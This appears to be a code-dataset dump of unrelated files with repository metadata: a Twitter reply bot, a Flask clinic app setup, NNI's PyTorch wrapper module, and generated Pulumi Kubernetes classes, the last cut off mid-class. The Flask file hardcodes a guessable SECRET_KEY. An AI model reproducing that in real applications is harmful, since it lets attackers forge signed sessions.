    _dump('val_lane_acc', val_lane_acc_list)
    _dump('val_total_acc', val_total_acc_list)
# Script entry point: only start training when executed directly.
if __name__ == '__main__':
    main()
| [
"630229262@qq.com"
] | 630229262@qq.com |
4a4f0ee250023d867691985d96d7fb0eafcee414 | 31e6ca145bfff0277509dbd7c4b44b8deddf3334 | /Programmers/Level1/Kth_num.py | a5998f0cf2a686d3094fcebc330240582ad25ce3 | [] | no_license | brillantescene/Coding_Test | 2582d6eb2d0af8d9ac33b8e829ff8c1682563c42 | 0ebc75cd66e1ccea3cedc24d6e457b167bb52491 | refs/heads/master | 2023-08-31T06:20:39.000734 | 2021-10-15T10:51:17 | 2021-10-15T10:51:17 | 254,366,460 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | def solution(array, commands):
answer = []
for i, j, k in commands:
tmp = array[i-1:j]
tmp.sort()
answer.append(tmp[k-1])
return answer
print(solution([1, 5, 2, 6, 3, 7, 4], [[2, 5, 3], [4, 4, 1], [1, 7, 3]]))
| [
"glisteneugene@gmail.com"
] | glisteneugene@gmail.com |
ec5c77459b18b633842cfeb1e04194433f5c8999 | 5296fa790a6cc05c4e800feac17186761c148740 | /autoreply.py | c55def9014090f77280f79e8be25596c6e17b22c | [] | no_license | tinyminds/twitterbot | 2b05549e23ac3f5930cbf9660b39decb99111c1a | 4b28147801f7a8443130ec8424c7042ba99b77a8 | refs/heads/master | 2022-12-09T21:38:25.178735 | 2019-11-27T20:41:37 | 2019-11-27T20:41:37 | 224,030,647 | 0 | 0 | null | 2022-12-08T06:58:01 | 2019-11-25T19:58:03 | Python | UTF-8 | Python | false | false | 2,019 | py | #!/usr/bin/env python
# tweepy-bots/bots/autoreply.py
import tweepy
import logging
import time
import sys
import os
from generate_advertisement import get_ad
#from credentials import * # use this one for testing
# use this for production; set vars in heroku dashboard
# Twitter API credentials, read from the environment (None when unset).
CONSUMER_KEY = os.environ.get('CONSUMER_KEY')
CONSUMER_SECRET = os.environ.get('CONSUMER_SECRET')
ACCESS_KEY = os.environ.get('ACCESS_KEY')
ACCESS_SECRET = os.environ.get('ACCESS_SECRET')
# Id of the last handled mention.
# NOTE(review): when set, this is a *string* (os.environ values always are).
SINCE_ID = os.environ.get('SINCE_ID')
INTERVAL = 60 * 60 * 6 # tweet every 6 hours
#INTERVAL = 15 # every 15 seconds, for testing
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
def check_mentions(api, keywords, since_id):
    """Reply to new mentions whose text contains any of *keywords*.

    Walks every mention newer than *since_id*; for matching top-level
    mentions it follows the author (if not already followed) and replies
    with an advertisement line.  Threaded replies are skipped.

    Args:
        api: authenticated tweepy.API instance.
        keywords: iterable of lowercase trigger words.
        since_id: id of the newest mention handled so far — int or numeric
            string (e.g. straight from the SINCE_ID environment variable).

    Returns:
        int: the highest mention id seen (== int(since_id) when there were
        no new mentions), to pass back on the next call.
    """
    logger.info("Retrieving mentions")
    # BUGFIX: since_id may come from the environment as a string; comparing
    # it against the integer tweet.id with max() raises TypeError on Py3.
    new_since_id = int(since_id)
    for tweet in tweepy.Cursor(api.mentions_timeline,
                               since_id=since_id).items():
        new_since_id = max(tweet.id, new_since_id)
        if tweet.in_reply_to_status_id is not None:
            # only answer top-level mentions, not threaded replies
            continue
        if any(keyword in tweet.text.lower() for keyword in keywords):
            logger.info(f"Answering to {tweet.user.screen_name} - {new_since_id}")
            if not tweet.user.following:
                tweet.user.follow()
            api.update_status(
                status="Hullo there @" + str(tweet.user.screen_name) + " " + str(get_ad()),
                in_reply_to_status_id=tweet.id,
            )
    return new_since_id
def main():
    """Authenticate with Twitter and poll mentions forever (every 300 s)."""
    auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
    auth.set_access_token(ACCESS_KEY, ACCESS_SECRET)
    # NOTE(review): wait_on_rate_limit_notify only exists in tweepy < 4.0 —
    # confirm the pinned tweepy version before upgrading.
    api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
    # NOTE(review): SINCE_ID is a string from the environment; it is passed
    # as-is to check_mentions on the first iteration.
    since_id = SINCE_ID #reset env variable with last id if it crashes. find a better way. date?
    logger.info(since_id)
    while True:
        since_id = check_mentions(api, ["hello", "shut up", "hullo", "hi", "hiya", "yo", "morning"], since_id)
        logger.info("Waiting...")
        logger.info(since_id)
        time.sleep(300)
if __name__ == "__main__":
main() | [
"jenny23@gmail.com"
] | jenny23@gmail.com |
aa877b523c25ed2dbd360625b6d019008e5819b4 | 5c0c0176db0ccf2c24b6b5ed459a8dc144518b13 | /nni/retiarii/nn/pytorch/nn.py | 797a672c8cf99ed4ccc35b43fccfc6dc009f0241 | [
"MIT"
] | permissive | petuum/nni | ac4f4a1c4d6df71684eeffa127b7c4858fd29e97 | 8134be6269902939232482d63649c06f9864be6d | refs/heads/master | 2023-02-18T11:21:41.078889 | 2021-01-20T03:21:50 | 2021-01-20T03:21:50 | 302,736,456 | 4 | 3 | MIT | 2020-11-20T20:21:15 | 2020-10-09T19:34:11 | Python | UTF-8 | Python | false | false | 10,748 | py | import logging
from typing import Any, List
import torch
import torch.nn as nn
from ...utils import add_record, blackbox_module, uid, version_larger_equal
_logger = logging.getLogger(__name__)
# NOTE: support pytorch version >= 1.5.0
__all__ = [
'LayerChoice', 'InputChoice', 'Placeholder',
'Module', 'Sequential', 'ModuleList', # TODO: 'ModuleDict', 'ParameterList', 'ParameterDict',
'Identity', 'Linear', 'Conv1d', 'Conv2d', 'Conv3d', 'ConvTranspose1d',
'ConvTranspose2d', 'ConvTranspose3d', 'Threshold', 'ReLU', 'Hardtanh', 'ReLU6',
'Sigmoid', 'Tanh', 'Softmax', 'Softmax2d', 'LogSoftmax', 'ELU', 'SELU', 'CELU', 'GLU', 'GELU', 'Hardshrink',
'LeakyReLU', 'LogSigmoid', 'Softplus', 'Softshrink', 'MultiheadAttention', 'PReLU', 'Softsign', 'Softmin',
'Tanhshrink', 'RReLU', 'AvgPool1d', 'AvgPool2d', 'AvgPool3d', 'MaxPool1d', 'MaxPool2d',
'MaxPool3d', 'MaxUnpool1d', 'MaxUnpool2d', 'MaxUnpool3d', 'FractionalMaxPool2d', "FractionalMaxPool3d",
'LPPool1d', 'LPPool2d', 'LocalResponseNorm', 'BatchNorm1d', 'BatchNorm2d', 'BatchNorm3d', 'InstanceNorm1d',
'InstanceNorm2d', 'InstanceNorm3d', 'LayerNorm', 'GroupNorm', 'SyncBatchNorm',
'Dropout', 'Dropout2d', 'Dropout3d', 'AlphaDropout', 'FeatureAlphaDropout',
'ReflectionPad1d', 'ReflectionPad2d', 'ReplicationPad2d', 'ReplicationPad1d', 'ReplicationPad3d',
'CrossMapLRN2d', 'Embedding', 'EmbeddingBag', 'RNNBase', 'RNN', 'LSTM', 'GRU', 'RNNCellBase', 'RNNCell',
'LSTMCell', 'GRUCell', 'PixelShuffle', 'Upsample', 'UpsamplingNearest2d', 'UpsamplingBilinear2d',
'PairwiseDistance', 'AdaptiveMaxPool1d', 'AdaptiveMaxPool2d', 'AdaptiveMaxPool3d', 'AdaptiveAvgPool1d',
'AdaptiveAvgPool2d', 'AdaptiveAvgPool3d', 'TripletMarginLoss', 'ZeroPad2d', 'ConstantPad1d', 'ConstantPad2d',
'ConstantPad3d', 'Bilinear', 'CosineSimilarity', 'Unfold', 'Fold',
'AdaptiveLogSoftmaxWithLoss', 'TransformerEncoder', 'TransformerDecoder',
'TransformerEncoderLayer', 'TransformerDecoderLayer', 'Transformer',
'Flatten', 'Hardsigmoid'
]
if version_larger_equal(torch.__version__, '1.6.0'):
__all__.append('Hardswish')
if version_larger_equal(torch.__version__, '1.7.0'):
__all__.extend(['Unflatten', 'SiLU', 'TripletMarginWithDistanceLoss'])
class LayerChoice(nn.Module):
def __init__(self, op_candidates, reduction=None, return_mask=False, key=None):
super(LayerChoice, self).__init__()
self.op_candidates = op_candidates
self.label = key if key is not None else f'layerchoice_{uid()}'
self.key = self.label # deprecated, for backward compatibility
for i, module in enumerate(op_candidates): # deprecated, for backward compatibility
self.add_module(str(i), module)
if reduction or return_mask:
_logger.warning('input arguments `reduction` and `return_mask` are deprecated!')
def forward(self, x):
return x
class InputChoice(nn.Module):
def __init__(self, n_candidates=None, choose_from=None, n_chosen=1,
reduction="sum", return_mask=False, key=None):
super(InputChoice, self).__init__()
self.n_candidates = n_candidates
self.n_chosen = n_chosen
self.reduction = reduction
self.label = key if key is not None else f'inputchoice_{uid()}'
self.key = self.label # deprecated, for backward compatibility
if choose_from or return_mask:
_logger.warning('input arguments `n_candidates`, `choose_from` and `return_mask` are deprecated!')
def forward(self, candidate_inputs: List[torch.Tensor]) -> torch.Tensor:
# fake return
return torch.tensor(candidate_inputs) # pylint: disable=not-callable
class ValueChoice:
"""
The instance of this class can only be used as input argument,
when instantiating a pytorch module.
TODO: can also be used in training approach
"""
def __init__(self, candidate_values: List[Any]):
self.candidate_values = candidate_values
class Placeholder(nn.Module):
def __init__(self, label, related_info):
add_record(id(self), related_info)
self.label = label
self.related_info = related_info
super(Placeholder, self).__init__()
def forward(self, x):
return x
class ChosenInputs(nn.Module):
"""
"""
def __init__(self, chosen: List[int], reduction: str):
super().__init__()
self.chosen = chosen
self.reduction = reduction
def forward(self, candidate_inputs):
return self._tensor_reduction(self.reduction, [candidate_inputs[i] for i in self.chosen])
def _tensor_reduction(self, reduction_type, tensor_list):
if reduction_type == "none":
return tensor_list
if not tensor_list:
return None # empty. return None for now
if len(tensor_list) == 1:
return tensor_list[0]
if reduction_type == "sum":
return sum(tensor_list)
if reduction_type == "mean":
return sum(tensor_list) / len(tensor_list)
if reduction_type == "concat":
return torch.cat(tensor_list, dim=1)
raise ValueError("Unrecognized reduction policy: \"{}\"".format(reduction_type))
# the following are pytorch modules
Module = nn.Module
class Sequential(nn.Sequential):
def __init__(self, *args):
add_record(id(self), {})
super(Sequential, self).__init__(*args)
class ModuleList(nn.ModuleList):
def __init__(self, *args):
add_record(id(self), {})
super(ModuleList, self).__init__(*args)
Identity = blackbox_module(nn.Identity)
Linear = blackbox_module(nn.Linear)
Conv1d = blackbox_module(nn.Conv1d)
Conv2d = blackbox_module(nn.Conv2d)
Conv3d = blackbox_module(nn.Conv3d)
ConvTranspose1d = blackbox_module(nn.ConvTranspose1d)
ConvTranspose2d = blackbox_module(nn.ConvTranspose2d)
ConvTranspose3d = blackbox_module(nn.ConvTranspose3d)
Threshold = blackbox_module(nn.Threshold)
ReLU = blackbox_module(nn.ReLU)
Hardtanh = blackbox_module(nn.Hardtanh)
ReLU6 = blackbox_module(nn.ReLU6)
Sigmoid = blackbox_module(nn.Sigmoid)
Tanh = blackbox_module(nn.Tanh)
Softmax = blackbox_module(nn.Softmax)
Softmax2d = blackbox_module(nn.Softmax2d)
LogSoftmax = blackbox_module(nn.LogSoftmax)
ELU = blackbox_module(nn.ELU)
SELU = blackbox_module(nn.SELU)
CELU = blackbox_module(nn.CELU)
GLU = blackbox_module(nn.GLU)
GELU = blackbox_module(nn.GELU)
Hardshrink = blackbox_module(nn.Hardshrink)
LeakyReLU = blackbox_module(nn.LeakyReLU)
LogSigmoid = blackbox_module(nn.LogSigmoid)
Softplus = blackbox_module(nn.Softplus)
Softshrink = blackbox_module(nn.Softshrink)
MultiheadAttention = blackbox_module(nn.MultiheadAttention)
PReLU = blackbox_module(nn.PReLU)
Softsign = blackbox_module(nn.Softsign)
Softmin = blackbox_module(nn.Softmin)
Tanhshrink = blackbox_module(nn.Tanhshrink)
RReLU = blackbox_module(nn.RReLU)
AvgPool1d = blackbox_module(nn.AvgPool1d)
AvgPool2d = blackbox_module(nn.AvgPool2d)
AvgPool3d = blackbox_module(nn.AvgPool3d)
MaxPool1d = blackbox_module(nn.MaxPool1d)
MaxPool2d = blackbox_module(nn.MaxPool2d)
MaxPool3d = blackbox_module(nn.MaxPool3d)
MaxUnpool1d = blackbox_module(nn.MaxUnpool1d)
MaxUnpool2d = blackbox_module(nn.MaxUnpool2d)
MaxUnpool3d = blackbox_module(nn.MaxUnpool3d)
FractionalMaxPool2d = blackbox_module(nn.FractionalMaxPool2d)
FractionalMaxPool3d = blackbox_module(nn.FractionalMaxPool3d)
LPPool1d = blackbox_module(nn.LPPool1d)
LPPool2d = blackbox_module(nn.LPPool2d)
LocalResponseNorm = blackbox_module(nn.LocalResponseNorm)
BatchNorm1d = blackbox_module(nn.BatchNorm1d)
BatchNorm2d = blackbox_module(nn.BatchNorm2d)
BatchNorm3d = blackbox_module(nn.BatchNorm3d)
InstanceNorm1d = blackbox_module(nn.InstanceNorm1d)
InstanceNorm2d = blackbox_module(nn.InstanceNorm2d)
InstanceNorm3d = blackbox_module(nn.InstanceNorm3d)
LayerNorm = blackbox_module(nn.LayerNorm)
GroupNorm = blackbox_module(nn.GroupNorm)
SyncBatchNorm = blackbox_module(nn.SyncBatchNorm)
Dropout = blackbox_module(nn.Dropout)
Dropout2d = blackbox_module(nn.Dropout2d)
Dropout3d = blackbox_module(nn.Dropout3d)
AlphaDropout = blackbox_module(nn.AlphaDropout)
FeatureAlphaDropout = blackbox_module(nn.FeatureAlphaDropout)
ReflectionPad1d = blackbox_module(nn.ReflectionPad1d)
ReflectionPad2d = blackbox_module(nn.ReflectionPad2d)
ReplicationPad2d = blackbox_module(nn.ReplicationPad2d)
ReplicationPad1d = blackbox_module(nn.ReplicationPad1d)
ReplicationPad3d = blackbox_module(nn.ReplicationPad3d)
CrossMapLRN2d = blackbox_module(nn.CrossMapLRN2d)
Embedding = blackbox_module(nn.Embedding)
EmbeddingBag = blackbox_module(nn.EmbeddingBag)
RNNBase = blackbox_module(nn.RNNBase)
RNN = blackbox_module(nn.RNN)
LSTM = blackbox_module(nn.LSTM)
GRU = blackbox_module(nn.GRU)
RNNCellBase = blackbox_module(nn.RNNCellBase)
RNNCell = blackbox_module(nn.RNNCell)
LSTMCell = blackbox_module(nn.LSTMCell)
GRUCell = blackbox_module(nn.GRUCell)
PixelShuffle = blackbox_module(nn.PixelShuffle)
Upsample = blackbox_module(nn.Upsample)
UpsamplingNearest2d = blackbox_module(nn.UpsamplingNearest2d)
UpsamplingBilinear2d = blackbox_module(nn.UpsamplingBilinear2d)
PairwiseDistance = blackbox_module(nn.PairwiseDistance)
AdaptiveMaxPool1d = blackbox_module(nn.AdaptiveMaxPool1d)
AdaptiveMaxPool2d = blackbox_module(nn.AdaptiveMaxPool2d)
AdaptiveMaxPool3d = blackbox_module(nn.AdaptiveMaxPool3d)
AdaptiveAvgPool1d = blackbox_module(nn.AdaptiveAvgPool1d)
AdaptiveAvgPool2d = blackbox_module(nn.AdaptiveAvgPool2d)
AdaptiveAvgPool3d = blackbox_module(nn.AdaptiveAvgPool3d)
TripletMarginLoss = blackbox_module(nn.TripletMarginLoss)
ZeroPad2d = blackbox_module(nn.ZeroPad2d)
ConstantPad1d = blackbox_module(nn.ConstantPad1d)
ConstantPad2d = blackbox_module(nn.ConstantPad2d)
ConstantPad3d = blackbox_module(nn.ConstantPad3d)
Bilinear = blackbox_module(nn.Bilinear)
CosineSimilarity = blackbox_module(nn.CosineSimilarity)
Unfold = blackbox_module(nn.Unfold)
Fold = blackbox_module(nn.Fold)
AdaptiveLogSoftmaxWithLoss = blackbox_module(nn.AdaptiveLogSoftmaxWithLoss)
TransformerEncoder = blackbox_module(nn.TransformerEncoder)
TransformerDecoder = blackbox_module(nn.TransformerDecoder)
TransformerEncoderLayer = blackbox_module(nn.TransformerEncoderLayer)
TransformerDecoderLayer = blackbox_module(nn.TransformerDecoderLayer)
Transformer = blackbox_module(nn.Transformer)
Flatten = blackbox_module(nn.Flatten)
Hardsigmoid = blackbox_module(nn.Hardsigmoid)
if version_larger_equal(torch.__version__, '1.6.0'):
Hardswish = blackbox_module(nn.Hardswish)
if version_larger_equal(torch.__version__, '1.7.0'):
SiLU = blackbox_module(nn.SiLU)
Unflatten = blackbox_module(nn.Unflatten)
TripletMarginWithDistanceLoss = blackbox_module(nn.TripletMarginWithDistanceLoss)
| [
"noreply@github.com"
] | petuum.noreply@github.com |
c63bdf11f6a794f3a32e12e32d0fa2996d6ca271 | 8b0830a11b40d1b15fb938f9cc8378c6b4e589ad | /Clinic1.1.1 copy/flaskblog/__init__.py | d5f660e17b018cb59057b0d34824391d3a2adcc7 | [] | no_license | Ericsson0/Clinic-web | 827a64f6a37edfcee3be36467822585fca270d0b | 054195612fcb943e9b0970e4058bdf671d2eb89b | refs/heads/main | 2023-05-03T11:44:05.673358 | 2021-05-28T16:07:33 | 2021-05-28T16:07:33 | 352,113,077 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,460 | py | import os
import jwt
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_bcrypt import Bcrypt
from flask_login import LoginManager
from flask_mail import Mail
from flask_script import Manager
from flask_admin import Admin
from flask_admin.contrib.sqla import ModelView
from flask_datepicker import datepicker
from functools import wraps
app = Flask(__name__)
app.config['SECRET_KEY'] = 'thisisthesecretkey'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///user.db' # SQL db, connect to site.db
app.config['SQLALCHEMY_BINDS'] = {'work_log' : 'sqlite:///work-log.db',
'patient' : 'sqlite:///patient.db',
'medicine' : 'sqlite:///medicine.db',
'detail' : 'sqlite:///detail.db',
'admin' : 'sqlite:///admin.db',
'announcement' : 'sqlite:///announcement.db',
'newpatient' : 'sqlite:///new-patient.db'}
db = SQLAlchemy(app)
bcrypt = Bcrypt(app)
datepicker(app)
login_manager = LoginManager(app)
login_manager.login_view = 'login'
login_manager.login_message_category = 'info'
app.config['MAIL_SERVER'] = 'smtp.gmail.com'
app.config['MAIL_PORT'] = 587
app.config['MAIL_USE_TLS'] = True
app.config['MAIL_USERNAME'] = 'your email'
app.config['MAIL_PASSWORD'] = 'your email password'
mail = Mail(app)
from flaskblog import routes
| [
"noreply@github.com"
] | Ericsson0.noreply@github.com |
c0aa5d5329950ee81536b28948f3e1c23999d7b9 | 2f4605e878c073d7f735eed1d675c2ee454ad68e | /sdk/python/pulumi_kubernetes/apiextensions/v1/_inputs.py | a8642aba88bfc3ac6d4fd00a72d0776d3c88c9b0 | [
"Apache-2.0"
] | permissive | pulumi/pulumi-kubernetes | 3c0c82e03a19f4077625d2ff6dae5ea4dbf90243 | b5d76f0731383f39903f35a6c1566f2f4344c944 | refs/heads/master | 2023-08-17T16:57:11.845935 | 2023-08-16T00:55:18 | 2023-08-16T00:55:18 | 116,869,354 | 353 | 128 | Apache-2.0 | 2023-09-13T21:42:01 | 2018-01-09T20:50:33 | Java | UTF-8 | Python | false | false | 206,572 | py | # coding=utf-8
# *** WARNING: this file was generated by pulumigen. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ... import meta as _meta
# Public API of this generated module: the input-argument classes for the
# apiextensions/v1 CustomResourceDefinition resources ("...PatchArgs" variants
# make every field optional for server-side-apply patches).
__all__ = [
    'CustomResourceColumnDefinitionPatchArgs',
    'CustomResourceColumnDefinitionArgs',
    'CustomResourceConversionPatchArgs',
    'CustomResourceConversionArgs',
    'CustomResourceDefinitionConditionArgs',
    'CustomResourceDefinitionNamesPatchArgs',
    'CustomResourceDefinitionNamesArgs',
    'CustomResourceDefinitionSpecPatchArgs',
    'CustomResourceDefinitionSpecArgs',
    'CustomResourceDefinitionStatusArgs',
    'CustomResourceDefinitionVersionPatchArgs',
    'CustomResourceDefinitionVersionArgs',
    'CustomResourceDefinitionArgs',
    'CustomResourceSubresourceScalePatchArgs',
    'CustomResourceSubresourceScaleArgs',
    'CustomResourceSubresourcesPatchArgs',
    'CustomResourceSubresourcesArgs',
    'CustomResourceValidationPatchArgs',
    'CustomResourceValidationArgs',
    'ExternalDocumentationPatchArgs',
    'ExternalDocumentationArgs',
    'JSONSchemaPropsPatchArgs',
    'JSONSchemaPropsArgs',
    'ServiceReferencePatchArgs',
    'ServiceReferenceArgs',
    'ValidationRulePatchArgs',
    'ValidationRuleArgs',
    'WebhookClientConfigPatchArgs',
    'WebhookClientConfigArgs',
    'WebhookConversionPatchArgs',
    'WebhookConversionArgs',
]
@pulumi.input_type
class CustomResourceColumnDefinitionPatchArgs:
    def __init__(__self__, *,
                 description: Optional[pulumi.Input[str]] = None,
                 format: Optional[pulumi.Input[str]] = None,
                 json_path: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 priority: Optional[pulumi.Input[int]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        CustomResourceColumnDefinition specifies a column for server side printing.
        Patch variant: every field is optional.

        :param description: Human-readable description of this column.
        :param format: Optional OpenAPI format; the 'name' format marks the
            primary identifier column. See the OpenAPI data-types specification.
        :param json_path: Simple JSON path (with array notation) evaluated
            against each custom resource to produce the column value.
        :param name: Human-readable name for the column.
        :param priority: Relative importance; lower numbers are higher priority,
            and columns with priority > 0 may be omitted in limited space.
        :param type: OpenAPI type definition for this column.
        """
        # Record only the fields the caller actually supplied.
        for key, val in (("description", description),
                         ("format", format),
                         ("json_path", json_path),
                         ("name", name),
                         ("priority", priority),
                         ("type", type)):
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """Human-readable description of this column."""
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def format(self) -> Optional[pulumi.Input[str]]:
        """Optional OpenAPI format; 'name' marks the primary identifier column."""
        return pulumi.get(self, "format")

    @format.setter
    def format(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "format", value)

    @property
    @pulumi.getter(name="jsonPath")
    def json_path(self) -> Optional[pulumi.Input[str]]:
        """JSON path evaluated against each custom resource to produce the value."""
        return pulumi.get(self, "json_path")

    @json_path.setter
    def json_path(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "json_path", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """Human-readable name for the column."""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def priority(self) -> Optional[pulumi.Input[int]]:
        """Relative importance; priority > 0 columns may be omitted when space is limited."""
        return pulumi.get(self, "priority")

    @priority.setter
    def priority(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "priority", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """OpenAPI type definition for this column."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class CustomResourceColumnDefinitionArgs:
    def __init__(__self__, *,
                 json_path: pulumi.Input[str],
                 name: pulumi.Input[str],
                 type: pulumi.Input[str],
                 description: Optional[pulumi.Input[str]] = None,
                 format: Optional[pulumi.Input[str]] = None,
                 priority: Optional[pulumi.Input[int]] = None):
        """
        CustomResourceColumnDefinition specifies a column for server side printing.

        :param json_path: Simple JSON path (with array notation) evaluated
            against each custom resource to produce the column value. Required.
        :param name: Human-readable name for the column. Required.
        :param type: OpenAPI type definition for this column. Required.
        :param description: Human-readable description of this column.
        :param format: Optional OpenAPI format; the 'name' format marks the
            primary identifier column.
        :param priority: Relative importance; lower numbers are higher priority,
            and columns with priority > 0 may be omitted in limited space.
        """
        # Required fields are always recorded.
        pulumi.set(__self__, "json_path", json_path)
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "type", type)
        # Optional fields are recorded only when supplied.
        for key, val in (("description", description),
                         ("format", format),
                         ("priority", priority)):
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter(name="jsonPath")
    def json_path(self) -> pulumi.Input[str]:
        """JSON path evaluated against each custom resource to produce the value."""
        return pulumi.get(self, "json_path")

    @json_path.setter
    def json_path(self, value: pulumi.Input[str]):
        pulumi.set(self, "json_path", value)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """Human-readable name for the column."""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """OpenAPI type definition for this column."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """Human-readable description of this column."""
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def format(self) -> Optional[pulumi.Input[str]]:
        """Optional OpenAPI format; 'name' marks the primary identifier column."""
        return pulumi.get(self, "format")

    @format.setter
    def format(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "format", value)

    @property
    @pulumi.getter
    def priority(self) -> Optional[pulumi.Input[int]]:
        """Relative importance; priority > 0 columns may be omitted when space is limited."""
        return pulumi.get(self, "priority")

    @priority.setter
    def priority(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "priority", value)
@pulumi.input_type
class CustomResourceConversionPatchArgs:
    def __init__(__self__, *,
                 strategy: Optional[pulumi.Input[str]] = None,
                 webhook: Optional[pulumi.Input['WebhookConversionPatchArgs']] = None):
        """
        CustomResourceConversion describes how to convert different versions of
        a CR. Patch variant: every field is optional.

        :param strategy: How custom resources are converted between versions.
            `"None"` only changes the apiVersion; `"Webhook"` calls an external
            webhook (requires spec.preserveUnknownFields to be false and
            spec.conversion.webhook to be set).
        :param webhook: How to call the conversion webhook. Required when
            `strategy` is `"Webhook"`.
        """
        # Record only the fields the caller actually supplied.
        for key, val in (("strategy", strategy), ("webhook", webhook)):
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def strategy(self) -> Optional[pulumi.Input[str]]:
        """Conversion strategy: `"None"` (apiVersion change only) or `"Webhook"`."""
        return pulumi.get(self, "strategy")

    @strategy.setter
    def strategy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "strategy", value)

    @property
    @pulumi.getter
    def webhook(self) -> Optional[pulumi.Input['WebhookConversionPatchArgs']]:
        """Webhook call settings; required when `strategy` is `"Webhook"`."""
        return pulumi.get(self, "webhook")

    @webhook.setter
    def webhook(self, value: Optional[pulumi.Input['WebhookConversionPatchArgs']]):
        pulumi.set(self, "webhook", value)
@pulumi.input_type
class CustomResourceConversionArgs:
    def __init__(__self__, *,
                 strategy: pulumi.Input[str],
                 webhook: Optional[pulumi.Input['WebhookConversionArgs']] = None):
        """
        CustomResourceConversion describes how to convert different versions of a CR.

        :param strategy: How custom resources are converted between versions.
            `"None"` only changes the apiVersion; `"Webhook"` calls an external
            webhook (requires spec.preserveUnknownFields to be false and
            spec.conversion.webhook to be set). Required.
        :param webhook: How to call the conversion webhook. Required when
            `strategy` is `"Webhook"`.
        """
        pulumi.set(__self__, "strategy", strategy)
        if webhook is not None:
            pulumi.set(__self__, "webhook", webhook)

    @property
    @pulumi.getter
    def strategy(self) -> pulumi.Input[str]:
        """Conversion strategy: `"None"` (apiVersion change only) or `"Webhook"`."""
        return pulumi.get(self, "strategy")

    @strategy.setter
    def strategy(self, value: pulumi.Input[str]):
        pulumi.set(self, "strategy", value)

    @property
    @pulumi.getter
    def webhook(self) -> Optional[pulumi.Input['WebhookConversionArgs']]:
        """Webhook call settings; required when `strategy` is `"Webhook"`."""
        return pulumi.get(self, "webhook")

    @webhook.setter
    def webhook(self, value: Optional[pulumi.Input['WebhookConversionArgs']]):
        pulumi.set(self, "webhook", value)
@pulumi.input_type
class CustomResourceDefinitionConditionArgs:
    def __init__(__self__, *,
                 status: pulumi.Input[str],
                 type: pulumi.Input[str],
                 last_transition_time: Optional[pulumi.Input[str]] = None,
                 message: Optional[pulumi.Input[str]] = None,
                 reason: Optional[pulumi.Input[str]] = None):
        """
        CustomResourceDefinitionCondition contains details for the current
        condition of this pod.

        :param status: Status of the condition: True, False, or Unknown. Required.
        :param type: Condition type (e.g. Established, NamesAccepted,
            Terminating). Required.
        :param last_transition_time: Last time the condition changed status.
        :param message: Human-readable details about the last transition.
        :param reason: Unique one-word CamelCase reason for the last transition.
        """
        # Required fields are always recorded.
        pulumi.set(__self__, "status", status)
        pulumi.set(__self__, "type", type)
        # Optional fields are recorded only when supplied.
        for key, val in (("last_transition_time", last_transition_time),
                         ("message", message),
                         ("reason", reason)):
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def status(self) -> pulumi.Input[str]:
        """Status of the condition: True, False, or Unknown."""
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: pulumi.Input[str]):
        pulumi.set(self, "status", value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """Condition type (e.g. Established, NamesAccepted, Terminating)."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter(name="lastTransitionTime")
    def last_transition_time(self) -> Optional[pulumi.Input[str]]:
        """Last time the condition transitioned from one status to another."""
        return pulumi.get(self, "last_transition_time")

    @last_transition_time.setter
    def last_transition_time(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "last_transition_time", value)

    @property
    @pulumi.getter
    def message(self) -> Optional[pulumi.Input[str]]:
        """Human-readable details about the last transition."""
        return pulumi.get(self, "message")

    @message.setter
    def message(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "message", value)

    @property
    @pulumi.getter
